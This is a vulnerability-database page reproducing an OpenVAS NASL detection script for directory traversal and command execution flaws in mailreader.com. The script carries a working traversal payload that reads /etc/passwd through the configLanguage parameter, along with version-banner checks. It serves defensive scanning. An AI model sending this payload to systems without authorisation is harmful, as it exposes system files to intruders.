Lucene search

K

mailreader.com directory traversal and arbitrary command execution

🗓️ 03 Nov 2005 00:00:00Reported by (C) Michel Arboi 2003Type 
openvas
 openvas
🔗 plugins.openvas.org👁 18 Views

mailreader.com directory traversal and arbitrary command execution. Upgrade to v2.3.32 or late

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Code
ReporterTitlePublishedViews
Family
OpenVAS
mailreader.com < 2.3.32 Multiple Vulnerabilities
3 Nov 200500:00
openvas
OpenVAS
Debian Security Advisory DSA 534-1 (mailreader)
17 Jan 200800:00
openvas
OpenVAS
Debian: Security Advisory (DSA-534)
17 Jan 200800:00
openvas
Tenable Nessus
Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities
26 Jun 200300:00
nessus
Tenable Nessus
Debian DSA-534-1 : mailreader - directory traversal
29 Sep 200400:00
nessus
NVD
CVE-2002-1582
6 Dec 200405:00
nvd
NVD
CVE-2002-1581
6 Dec 200405:00
nvd
Cvelist
CVE-2002-1582
6 Jul 200404:00
cvelist
Cvelist
CVE-2002-1581
6 Jul 200404:00
cvelist
OSV
DSA-534 mailreader - directory traversal
22 Jul 200400:00
osv
Rows per page
# OpenVAS Vulnerability Test
# $Id: mailreader.nasl 5783 2017-03-30 09:03:43Z cfi $
# Description: mailreader.com directory traversal and arbitrary command execution
#
# Authors:
# Michel Arboi <[email protected]>
#
# Copyright:
# Copyright (C) 2003 Michel Arboi
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "mailreader.com software is installed. A directory traversal flaw 
allows anybody to read arbitrary files on your system.";

tag_solution = "upgrade to v2.3.32 or later";

# References:
# Date: Mon, 28 Oct 2002 17:48:04 +0800
# From: "pokleyzz" <[email protected]>
# To: "bugtraq" <[email protected]>, 
#  "Shaharil Abdul Malek" <[email protected]>, 
#  "sk" <[email protected]>, "pokley" <[email protected]>, 
#  "Md Nazri Ahmad" <[email protected]> 
# Subject: SCAN Associates Advisory : Multiple vurnerabilities on mailreader.com

if(description)
{
  script_id(11780);
  script_version("$Revision: 5783 $");
  script_tag(name:"last_modification", value:"$Date: 2017-03-30 11:03:43 +0200 (Thu, 30 Mar 2017) $");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_cve_id("CVE-2002-1581", "CVE-2002-1582");
  script_bugtraq_id(5393, 6055, 6058);
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("mailreader.com directory traversal and arbitrary command execution");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_banner");
  script_copyright("(C) Michel Arboi 2003");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

dirtrav = 1; version = 1;

foreach dir( make_list_unique( "/", cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";

  r2 = NULL;
  if (dirtrav)
  {
    r = http_get(port: port, item: strcat(dir, "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"));
    r2 =  http_keepalive_send_recv(port: port, data: r);
    if (isnull(r2)) exit(0);	# Dead server
    if (r2 =~ "root:[^:]*:0:[01]:")
    {
      security_message(port);
      dirtrav = 0;
    }
  }

  if (version)
  {
    if (r2 !~ "Powered by Mailreader.com v[0-9.]*")
    {
      r = http_get(port: port, item: strcat(dir,  "/nph-mr.cgi?do=loginhelp&configLanguage=english"));
      r2 =  http_keepalive_send_recv(port: port, data: r);
    }
    if (r2 =~ "Powered by Mailreader.com v2\.3\.3[01]")
    {
      m = "You are running a version of mailreader.com software 
which allows any authenticated user to run arbitrary commands
on your system.

*** Note that OpenVAS just checked the version number and did not
*** perform a real attack. So this might be a false alarm.

Solution: upgrade to v2.3.32 or later";
      security_message(port: port, data: m);
      version = 0;
    }
    else if (r2 =~ "Powered by Mailreader.com v2\.([0-1]\.*|2\.([0-2]\..*|3\.([0-9][^0-9]|[12][0-9])))")
    {
# Note: SecurityFocus #5393 advises you to upgrade to 2.3.30, but
# this version contains a terrible flaw! (read above)
      m = "You are running an old version of mailreader.com software 
which allows an attacker to hijack user session.

*** Note that OpenVAS just checked the version number and did not
*** perform a real attack. So this might be a false alarm.

Solution: upgrade to v2.3.32 or later";
      security_message(port: port, data: m);
      version = 0;
    }
  }
  if (! version && ! dirtrav) exit(0);
}

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Nov 2005 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.09746
18
.json
Report